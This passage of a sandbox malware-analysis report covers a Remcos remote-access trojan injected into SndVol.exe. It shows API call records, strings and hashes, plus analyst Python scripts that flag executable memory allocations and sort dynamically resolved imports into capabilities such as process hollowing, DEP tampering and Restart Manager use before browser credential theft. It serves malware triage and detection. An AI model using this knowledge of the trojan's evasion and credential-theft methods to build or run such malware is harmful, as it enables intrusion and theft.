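               0x20: "CRYPT_MACHINE_KEYSET", 0x40: "CRYPT_SILENT"}

# Sample input: API lines copied verbatim from the records on this page.
REPORT_LINES = """
• VirtualAlloc.KERNEL32(?,?,00003000,00000040,?,?,?,?,00000000,?,?,?,00000000), ref: 044212A3
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,?,?,00000000,?,?,?,00000000,?,?,?,00007463), ref: 044212B3
• LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 044213FA
• Part of subcall function 29143584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 291435A4
• Sleep.KERNEL32(00000BB8), ref: 2913F896
• CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,29163550,00000034,?,?,025ED9A0), ref: 291638DA
""".strip().splitlines()

LINE_RE = re.compile(r"(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)")
HEX_RE = re.compile(r"[0-9A-Fa-f]{1,8}")


def parse_api_lines(lines):
    """Yield {'api', 'module', 'args', 'ref'}; '?' and non-numeric (string) args become None."""
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        args = [int(a, 16) if HEX_RE.fullmatch(a) else None for a in m.group(3).split(",")]
        yield {"api": m.group(1), "module": m.group(2), "args": args, "ref": m.group(4).upper()}


def _bits(value, table):
    """Names of all flag bits from `table` that are set in `value`, in ascending bit order."""
    return [name for bit, name in sorted(table.items()) if value & bit == bit]


def decode_call(call):
    """Decode the parameters that matter for triage; slots past the documented
    parameter count are stack residue printed by the sandbox and are ignored."""
    api, a = call["api"], call["args"]
    out = {"api": api, "ref": call["ref"]}
    if api == "VirtualAlloc" and len(a) >= 4 and a[3] is not None:
        out["flAllocationType"] = _bits(a[2] or 0, MEM_FLAGS)
        out["flProtect"] = PAGE_PROTECT.get(a[3] & 0xFF, hex(a[3]))
        out["rwx"] = (a[3] & 0xFF) == 0x40          # PAGE_EXECUTE_READWRITE
    elif api.startswith("RegOpenKeyEx") and len(a) >= 4:
        out["hKey"] = HKEY_ROOTS.get(a[0], hex(a[0]) if a[0] is not None else "?")
        out["samDesired"] = KEY_ACCESS.get(a[3], hex(a[3]) if a[3] is not None else "?")
    elif api == "Sleep" and a and a[0] is not None:
        out["milliseconds"] = a[0]
    elif api.startswith("CryptAcquireContext") and len(a) >= 5:
        out["dwProvType"] = PROV_TYPES.get(a[3], str(a[3]))
        out["dwFlags"] = _bits(a[4] or 0, CRYPT_FLAGS)
    return out


def decode_by_ref(lines):
    """Decoded calls keyed by their ref address, for quick lookup."""
    return {d["ref"]: d for d in (decode_call(c) for c in parse_api_lines(lines))}


def rwx_allocations(lines):
    """Ref addresses of VirtualAlloc calls that request executable+writable memory,
    the strongest single indicator in the record above that code is being staged."""
    return [ref for ref, d in decode_by_ref(lines).items() if d.get("rwx")]


if __name__ == "__main__":
    for d in decode_by_ref(REPORT_LINES).values():
        print(d)
    print("RWX allocations at:", rwx_allocations(REPORT_LINES))
```

Run against the lines above, both VirtualAlloc calls decode to PAGE_EXECUTE_READWRITE (the first with MEM_COMMIT|MEM_RESERVE, the second MEM_COMMIT only), the registry read opens HKEY_CURRENT_USER with KEY_READ, the sleep is 3000 ms, and the CryptoAPI context is PROV_RSA_FULL with CRYPT_VERIFYCONTEXT, i.e. a key-less context used only for CryptGenRandom.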
                                                                        APIs
                                                                        • GetUserNameW.ADVAPI32(?,2913F25E), ref: 2914B6D3
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: NameUser
                                                                        • String ID:
                                                                        • API String ID: 2645101109-0
                                                                        • Opcode ID: 0d51efe53fbed1dcd511336948ea198dd385d17bed5e411a599517add0938968
                                                                        • Instruction ID: 1f8903f07eebb44bbbf822c1b54f33bdd30bb7a8c92110304e727f3214108c02
                                                                        • Opcode Fuzzy Hash: 0d51efe53fbed1dcd511336948ea198dd385d17bed5e411a599517add0938968
                                                                        • Instruction Fuzzy Hash: 4B014F7190011CABDB00DBD1DC44ADDB7BCAF54305F504156E405A2194EF746B8ECB98
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: recv
                                                                        • String ID:
                                                                        • API String ID: 1507349165-0
                                                                        • Opcode ID: 9d31b8620238c20ff5e5c8f9daf7048c5ad05b810b6bf29d98bc15f7d3164c87
                                                                        • Instruction ID: 13bf1add483ba26ff28f7ceadf9eb63b452e183994c934c2ec9b6439896154a5
                                                                        • Opcode Fuzzy Hash: 9d31b8620238c20ff5e5c8f9daf7048c5ad05b810b6bf29d98bc15f7d3164c87
                                                                        • Instruction Fuzzy Hash: 58B09279208242FF9A0A2B61CC08C6ABEB6BBC8381B018C0CB58640130C63A8450AB21

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,2913EA1C), ref: 2914CBF6
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CBFF
                                                                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,2913EA1C), ref: 2914CC16
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CC19
                                                                        • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,2913EA1C), ref: 2914CC2B
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CC2E
                                                                        • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,2913EA1C), ref: 2914CC3F
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CC42
                                                                        • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,2913EA1C), ref: 2914CC54
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CC57
                                                                        • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,2913EA1C), ref: 2914CC63
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CC66
                                                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,2913EA1C), ref: 2914CC77
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CC7A
                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,2913EA1C), ref: 2914CC8B
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CC8E
                                                                        • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,2913EA1C), ref: 2914CC9F
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CCA2
                                                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,2913EA1C), ref: 2914CCB3
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CCB6
                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,2913EA1C), ref: 2914CCC7
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CCCA
                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,2913EA1C), ref: 2914CCDB
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CCDE
                                                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,2913EA1C), ref: 2914CCEF
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CCF2
                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,2913EA1C), ref: 2914CD03
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CD06
                                                                        • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,2913EA1C), ref: 2914CD14
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CD17
                                                                        • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,2913EA1C), ref: 2914CD28
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CD2B
                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,2913EA1C), ref: 2914CD38
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CD3B
                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,2913EA1C), ref: 2914CD48
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CD4B
                                                                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,2913EA1C), ref: 2914CD5D
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CD60
                                                                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,2913EA1C), ref: 2914CD6D
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CD70
                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,2913EA1C), ref: 2914CD81
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CD84
                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,2913EA1C), ref: 2914CD95
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CD98
                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,2913EA1C), ref: 2914CDAA
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CDAD
                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,2913EA1C), ref: 2914CDBA
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CDBD
                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,2913EA1C), ref: 2914CDCA
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CDCD
                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,2913EA1C), ref: 2914CDDA
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914CDDD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$LibraryLoad$HandleModule
                                                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                        • API String ID: 4236061018-3687161714
                                                                        • Opcode ID: 35156afcd5ed06e92121094e7beed4e76f84e18876e5411821bb6e1fd2c9079c
                                                                        • Instruction ID: a4ffd5de6d4091f0b76166f715f86e8a87ca86dafe5702ffd8c9f08d8172904d
                                                                        • Opcode Fuzzy Hash: 35156afcd5ed06e92121094e7beed4e76f84e18876e5411821bb6e1fd2c9079c
                                                                        • Instruction Fuzzy Hash: C6419CA0D2039CFAEA107BB75DCDD1B3D9DE9952983820816B45DE7548DA3CDE02CFA4
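The function at 2914CBE1 above resolves its imports at run time through LoadLibraryA/GetModuleHandleA followed by GetProcAddress, which keeps the names out of the import table. Because Joe Sandbox prints the raw stack slots after each call's documented parameters, the name pushed for the following GetProcAddress shows up as the second slot of each LoadLibraryA/GetModuleHandleA line, so the full resolved-import table can be recovered from those lines alone. The Python below is an added example, not the report's or the analyser's own code: it extracts the (module, symbol) pairs from the lines copied verbatim from the record above, treats an 8-hex-digit slot as an ordinal import, and groups the symbols by what they are typically used for. The capability mapping is this example's own analyst judgement and an assumption, not something the report states.

```python
import re

# Analyst mapping (an assumption of this example, not the report's): what each
# dynamically resolved import is typically used for by a remote-access trojan.
CAPABILITIES = {
    "process injection / hollowing": {"NtUnmapViewOfSection", "NtSuspendProcess", "NtResumeProcess"},
    "process introspection": {"NtQueryInformationProcess", "GetProcessImageFileNameW",
                              "GetFinalPathNameByHandleW", "IsWow64Process"},
    "host profiling": {"GetComputerNameExW", "GlobalMemoryStatusEx", "GetSystemTimes",
                       "EnumDisplayDevicesW", "EnumDisplayMonitors", "GetMonitorInfoW"},
    "privilege check": {"IsUserAnAdmin"},
    "exploit-mitigation tampering": {"SetProcessDEPPolicy"},
    "network connection enumeration": {"GetExtendedTcpTable", "GetExtendedUdpTable"},
    "file-lock owner discovery (Restart Manager)": {"RmStartSession", "RmRegisterResources",
                                                    "RmGetList", "RmEndSession"},
    "window handling": {"GetConsoleWindow", "SetProcessDpiAwareness"},
}

# Sample input: the LoadLibraryA/GetModuleHandleA lines copied from the record above.
# The interleaved GetProcAddress lines carry no names and are not needed.
RESOLVER_LINES = """
• LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,2913EA1C), ref: 2914CBF6
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,2913EA1C), ref: 2914CC16
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,2913EA1C), ref: 2914CC2B
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,2913EA1C), ref: 2914CC3F
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,2913EA1C), ref: 2914CC54
• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,2913EA1C), ref: 2914CC63
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,2913EA1C), ref: 2914CC77
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,2913EA1C), ref: 2914CC8B
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,2913EA1C), ref: 2914CC9F
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,2913EA1C), ref: 2914CCB3
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,2913EA1C), ref: 2914CCC7
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,2913EA1C), ref: 2914CCDB
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,2913EA1C), ref: 2914CCEF
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,2913EA1C), ref: 2914CD03
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,2913EA1C), ref: 2914CD14
• LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,2913EA1C), ref: 2914CD28
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,2913EA1C), ref: 2914CD38
• GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,2913EA1C), ref: 2914CD48
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,2913EA1C), ref: 2914CD5D
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,2913EA1C), ref: 2914CD6D
• GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,2913EA1C), ref: 2914CD81
• GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,2913EA1C), ref: 2914CD95
• LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,2913EA1C), ref: 2914CDAA
• LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,2913EA1C), ref: 2914CDBA
• LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,2913EA1C), ref: 2914CDCA
• LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,2913EA1C), ref: 2914CDDA
""".strip().splitlines()

# module name in the first slot, symbol (or ordinal) in the second, ref address at the end
RESOLVE_RE = re.compile(
    r"(LoadLibraryA|GetModuleHandleA)\.KERNEL32\(([^,]+),([^,)]+)[^)]*\),\s*ref:\s*([0-9A-F]+)")
ORDINAL_RE = re.compile(r"^[0-9A-F]{8}$")


def resolved_imports(lines):
    """Return [(module, symbol, ref)] recovered from the module-lookup lines.
    An 8-hex-digit second slot is the ordinal passed to GetProcAddress, not a name."""
    out = []
    for line in lines:
        m = RESOLVE_RE.search(line)
        if not m:
            continue
        module, sym, ref = m.group(2), m.group(3), m.group(4)
        if ORDINAL_RE.match(sym):
            sym = f"ordinal {int(sym, 16)}"
        out.append((module.lower(), sym, ref))
    return out


def classify(imports):
    """Group symbols by capability; anything outside the mapping goes to 'unclassified'.
    Duplicates (e.g. the Psapi/Kernel32 fallback for the same name) collapse to one entry."""
    groups = {cap: [] for cap in CAPABILITIES}
    groups["unclassified"] = []
    for module, sym, _ref in imports:
        for cap, names in CAPABILITIES.items():
            if sym in names:
                groups[cap].append(sym)
                break
        else:
            groups["unclassified"].append(f"{module}!{sym}")
    return {cap: sorted(set(v)) for cap, v in groups.items() if v}


if __name__ == "__main__":
    for cap, syms in classify(resolved_imports(RESOLVER_LINES)).items():
        print(f"{cap}: {', '.join(syms)}")
```

The one entry that stays unclassified is `shlwapi!ordinal 12`: resolving by ordinal hides even the symbol name from string-based triage, so it is worth looking up the export table of the Shlwapi build on the analysis VM rather than guessing. The Restart Manager group is the non-obvious one: RmStartSession/RmRegisterResources/RmGetList report which processes hold a given file open, a common prelude to terminating a browser before reading its credential store, which matches the Chrome and Firefox credential-theft signatures listed for this sample.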

                                                                        Control-flow Graph

• Control-flow graph omitted (function 2913ea00, a top-level routine of the payload running in SndVol.exe, process 8); only node and edge identifiers survive. API calls visible in its nodes: GetModuleFileNameW in the entry block, StrToIntA, SetProcessDEPPolicy at 2913f27b, seven CreateThread sites between 2913effe and 2913f2a8, and DeleteFileW at 2913f381 inside a loop that calls Sleep (2913f36f) and retries the delete.
                                                                        APIs
                                                                          • Part of subcall function 2914CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,2913EA1C), ref: 2914CBF6
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CBFF
                                                                          • Part of subcall function 2914CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,2913EA1C), ref: 2914CC16
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CC19
                                                                          • Part of subcall function 2914CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,2913EA1C), ref: 2914CC2B
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CC2E
                                                                          • Part of subcall function 2914CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,2913EA1C), ref: 2914CC3F
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CC42
                                                                          • Part of subcall function 2914CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,2913EA1C), ref: 2914CC54
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CC57
                                                                          • Part of subcall function 2914CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,2913EA1C), ref: 2914CC63
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CC66
                                                                          • Part of subcall function 2914CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,2913EA1C), ref: 2914CC77
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CC7A
                                                                          • Part of subcall function 2914CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,2913EA1C), ref: 2914CC8B
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CC8E
                                                                          • Part of subcall function 2914CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,2913EA1C), ref: 2914CC9F
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CCA2
                                                                          • Part of subcall function 2914CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,2913EA1C), ref: 2914CCB3
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CCB6
                                                                          • Part of subcall function 2914CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,2913EA1C), ref: 2914CCC7
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CCCA
                                                                          • Part of subcall function 2914CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,2913EA1C), ref: 2914CCDB
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CCDE
                                                                          • Part of subcall function 2914CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,2913EA1C), ref: 2914CCEF
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CCF2
                                                                          • Part of subcall function 2914CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,2913EA1C), ref: 2914CD03
                                                                          • Part of subcall function 2914CBE1: GetProcAddress.KERNEL32(00000000), ref: 2914CD06
                                                                          • Part of subcall function 2914CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,2913EA1C), ref: 2914CD14
                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\SndVol.exe,00000104), ref: 2913EA29
                                                                          • Part of subcall function 29140F72: __EH_prolog.LIBCMT ref: 29140F77
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                        • String ID: Access Level: $Administrator$C:\Windows\SysWOW64\SndVol.exe$Exe$Inj$Remcos Agent initialized$Software\$User$del$del$exepath$licence$license_code.txt

                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000,00000029,291A52F0,291A50E4,00000000), ref: 29144FB6
                                                                        • WSAGetLastError.WS2_32(00000000,00000001), ref: 291451C7
                                                                        • Sleep.KERNEL32(00000000,00000002), ref: 29145B12
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        • API ID: Sleep$ErrorLastLocalTime
                                                                        • String ID: | $%I64u$5.1.2 Pro$C:\Windows\SysWOW64\SndVol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name

                                                                        APIs
                                                                        • connect.WS2_32(?,?,?), ref: 291348E0
                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 29134A00
                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 29134A0E
                                                                        • WSAGetLastError.WS2_32 ref: 29134A21
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |

                                                                        APIs
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,291351C0,?,?,?,29135159), ref: 29134E38
                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,291351C0,?,?,?,29135159), ref: 29134E43
                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,291351C0,?,?,?,29135159), ref: 29134E4C
                                                                        • closesocket.WS2_32(000000FF), ref: 29134E5A
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,291351C0,?,?,?,29135159), ref: 29134E91
                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 29134EA2
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 29134EA9
                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29134EBA
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29134EBF
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29134EC4
                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,291351C0,?,?,?,29135159), ref: 29134ED1
                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,291351C0,?,?,?,29135159), ref: 29134ED6
                                                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                        • String ID:

                                                                        APIs
                                                                        • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 2913DBD5
                                                                        • API ID: LongNamePath
                                                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32

                                                                        APIs
                                                                          • Part of subcall function 2914C048: GetCurrentProcess.KERNEL32(?,?,?,2913DAE5,WinDir,00000000,00000000), ref: 2914C059
                                                                          • Part of subcall function 291435E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 29143605
                                                                          • Part of subcall function 291435E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 29143622
                                                                          • Part of subcall function 291435E1: RegCloseKey.KERNEL32(?), ref: 2914362D
                                                                        • StrToIntA.SHLWAPI(00000000,2919CA08,00000000,00000000,00000000,291A50E4,00000003,Exe,00000000,0000000E,00000000,291960CC,00000003,00000000), ref: 2914B3CD
                                                                        • API ID: CloseCurrentOpenProcessQueryValue
                                                                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion

                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(?), ref: 29134F81
                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 29134FCD
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 29134FE0
                                                                        Strings
                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 29134F94
                                                                        • API ID: Create$EventLocalThreadTime
                                                                        • String ID: KeepAlive | Enabled | Timeout:

                                                                        APIs
                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 291437B9
                                                                        • RegSetValueExA.KERNEL32(?,291974C8,00000000,?,00000000,00000000,291A52F0,?,?,2913F88E,291974C8,5.1.2 Pro), ref: 291437E1
                                                                        • RegCloseKey.KERNEL32(?,?,?,2913F88E,291974C8,5.1.2 Pro), ref: 291437EC
                                                                        • API ID: CloseCreateValue
                                                                        • String ID: pth_unenc

                                                                        APIs
                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 29143605
                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 29143622
                                                                        • RegCloseKey.KERNEL32(?), ref: 2914362D
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID:

                                                                        APIs
                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 291435A4
                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,291A52F0), ref: 291435C2
                                                                        • RegCloseKey.KERNEL32(?), ref: 291435CD
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3677997916-0
                                                                        • Opcode ID: eae27d50b206fd8eb75dde5f61e4fa202824f887e44c00cd6b71a239fe2a5412
                                                                        • Instruction ID: 885425df837dd00aeadbbc5c67b72bd89c0f4e67f429b56b85512fa77998a037
                                                                        • Opcode Fuzzy Hash: eae27d50b206fd8eb75dde5f61e4fa202824f887e44c00cd6b71a239fe2a5412
                                                                        • Instruction Fuzzy Hash: EDF01D76E0021CBFEF109EA1ED49FED7BBCEB08714F108095BA04EA141E6355B15AB90

                                                                        Control-flow Graph (graph image not preserved; blocks: 1289 2914353a-29143559 RegOpenKeyExA; 1290 2914357d; 1291 2914355b-2914357b RegQueryValueExA, RegCloseKey; 1292 2914357f-29143583; edges: 1289->1290, 1289->1291, 1290->1292, 1291->1292)
                                                                        APIs
